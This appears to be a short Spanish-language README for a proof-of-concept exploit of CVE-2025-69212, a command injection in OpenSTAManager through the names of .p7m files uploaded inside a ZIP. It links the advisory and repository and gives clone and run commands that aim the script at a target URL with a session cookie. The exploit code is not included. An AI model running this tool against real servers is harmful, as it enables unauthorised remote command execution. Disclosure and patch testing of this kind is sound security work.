
Exploit de prueba de concepto para CVE-2025-69212, una inyección de comandos del sistema operativo en OpenSTAManager. Carga un archivo .p7m malicioso a través de ZIP para ejecutar comandos arbitrarios en el servidor objetivo.
https://github.com/advisories/GHSA-25fp-8w8p-mx36
OpenSTAManager (versiones <= 2.9.8) tiene una vulnerabilidad crítica de inyección de comandos del sistema operativo en la funcionalidad de decodificación de archivos P7M (XML firmado). Un atacante autenticado puede subir un archivo ZIP que contenga un archivo .p7m con un nombre de archivo malicioso para ejecutar comandos arbitrarios del sistema en el servidor.
git clone https://github.com/xorandd/CVE-2025-69212-PoC
cd CVE-2025-69212-PoC
python3 CVE-2025-69212.py -u http://target.com -C <PHPSESSID_cookie>
CVE-2025-69212.py [-h] -u URL -C COOKIE
options:
-h, --help show this help message and exit
-u, --url URL target url, eg http://127.0.0.1
-C, --cookie COOKIE cookie value